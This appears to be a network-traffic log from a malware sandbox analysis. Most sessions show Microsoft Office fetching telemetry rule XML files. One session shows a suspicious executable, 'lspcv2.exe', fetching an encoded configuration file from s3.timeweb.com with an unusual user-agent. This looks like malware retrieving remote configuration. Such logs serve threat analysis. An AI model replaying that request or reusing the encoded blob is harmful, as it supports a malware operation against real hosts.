                                                                                                                   2024-11-14 14:00:50 UTC  192                OUT        GET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 428
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                  ETag: "0x8DC582BAC4F34CA"
                                                                                                                  x-ms-request-id: ec03aeec-b01e-005c-7ba1-344c66000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765dbczshC1DFW33an00000002e000000000cfav
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.4 | 49833 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:50 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:50 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:50 GMT
Content-Type: text/xml
Content-Length: 499
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
ETag: "0x8DC582B98CEC9F6"
x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140050Z-16547b76f7fnlcwwhC1DFWz6gw0000000ku000000000cn6b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:50 UTC | 499 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49830 | 92.53.116.138 | 443 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:50 UTC | 107 | OUT | GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
User-Agent: ler1255.txt
Host: s3.timeweb.com
2024-11-14 14:00:51 UTC | 867 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 14:00:50 GMT
Content-Type: text/plain
Content-Length: 510
Connection: close
Accept-Ranges: bytes
Access-Control-Expose-Headers: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma, Etag, X-Timestamp, X-Trans-Id, X-Openstack-Request-Id, Content-Length, Accept-Ranges
Age: 5176
Etag: "8cc325c4a72b846a690145124f81749a"
Last-Modified: Mon, 30 Oct 2023 15:08:01 GMT
X-Container-Storage-Policy-Index: 0
X-Container-Storage-Policy-Name: Policy-0
X-Krakend: Version 1.4.1
X-Krakend-Completed: false
X-Timestamp: 1698678480.28571
X-Trans-Id: f48a3518-8613-4ed9-8850-e7c442a10a47
Expires: Thu, 14 Nov 2024 14:01:20 GMT
Cache-Control: max-age=30
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Headers: *
Access-Control-Max-Age: 1728000
2024-11-14 14:00:51 UTC | 510 | IN | Data Ascii: MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpa


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.2.4 | 49834 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:50 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:50 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:50 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B988EBD12"
x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140050Z-16547b76f7fm7xw6hC1DFW5px40000000kmg00000000dh2h
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:50 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.2.4 | 49836 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:50 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:51 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:50 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB32BB5CB"
x-ms-request-id: 2e90e071-a01e-0098-64a3-348556000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140050Z-1749fc9bdbdjgplnhC1DFWhrks00000002h0000000005vvx
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:51 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.4 | 49835 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:50 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:51 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:50 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5815C4C"
x-ms-request-id: 29462bed-001e-0066-044a-36561e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140050Z-r178fb8d765skzg4hC1DFW090c00000000y000000000183a
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:00:51 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.2.4 | 49838 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:51 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:51 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:51 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8972972"
x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140051Z-16547b76f7f22sh5hC1DFWyb4w0000000kqg0000000063uz
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:00:51 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  77 | 192.168.2.4 | 49839 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:51 UTC | 192 | OUT | GET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 420
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                  ETag: "0x8DC582B9DAE3EC0"
                                                                                                                  x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-16547b76f7f7rtshhC1DFWrtqn0000000kvg000000001x19
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC | 420 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  78 | 192.168.2.4 | 49840 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:51 UTC | 192 | OUT | GET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                  ETag: "0x8DC582B9D43097E"
                                                                                                                  x-ms-request-id: 53aae69c-201e-005d-6aa2-34afb3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-1749fc9bdbdr6qwphC1DFW0nv400000002n000000000e274
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  79 | 192.168.2.4 | 49841 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:51 UTC | 192 | OUT | GET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                  ETag: "0x8DC582BA909FA21"
                                                                                                                  x-ms-request-id: 03686dcf-301e-0099-31a0-346683000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-r178fb8d765tllwdhC1DFWaz8400000002m000000000gz3f
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  80 | 192.168.2.4 | 49842 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:51 UTC | 192 | OUT | GET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 486
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                  ETag: "0x8DC582B92FCB436"
                                                                                                                  x-ms-request-id: e1bc049e-701e-003e-11a5-3479b3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-1749fc9bdbdmg6wshC1DFWu2bc00000002n000000000dewn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  81 | 192.168.2.4 | 49845 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:52 UTC | 192 | OUT | GET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 423
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                  ETag: "0x8DC582BB7564CE8"
                                                                                                                  x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-16547b76f7f8dwtrhC1DFWd1zn0000000kwg000000006856
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC | 423 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  82 | 192.168.2.4 | 49846 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:52 UTC | 192 | OUT | GET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 478
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                  ETag: "0x8DC582B9B233827"
                                                                                                                  x-ms-request-id: aa8338a3-a01e-0021-72a2-34814c000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-r178fb8d765tllwdhC1DFWaz8400000002rg000000008td1
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC | 478 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  83 | 192.168.2.4 | 49847 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:52 UTC | 192 | OUT | GET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 404
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                  ETag: "0x8DC582B95C61A3C"
                                                                                                                  x-ms-request-id: 2b6e93c1-f01e-00aa-0c07-368521000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-1749fc9bdbds4vwlhC1DFWz44000000002dg00000000frs5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  84 | 192.168.2.4 | 49849 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:52 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                  ETag: "0x8DC582BB046B576"
                                                                                                                  x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-16547b76f7frbg6bhC1DFWr5400000000kqg000000005p85
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC | 468 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  85 | 192.168.2.4 | 49850 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:52 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 400
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                  ETag: "0x8DC582BB2D62837"
                                                                                                                  x-ms-request-id: f331b341-a01e-0070-670c-36573b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-1749fc9bdbddrtrhhC1DFWsq8000000002rg000000006409
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC | 400 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  86 | 192.168.2.4 | 49853 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:53 UTC | 192 | OUT | GET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 425
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                  ETag: "0x8DC582BBA25094F"
                                                                                                                  x-ms-request-id: 79c751c3-501e-0078-3aa2-3406cf000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-1749fc9bdbd2jxtthC1DFWfk5w00000002hg000000009480
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC | 425 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  87 | 192.168.2.4 | 49854 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:53 UTC | 192 | OUT | GET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 475
                                                                                                                  Connection: close
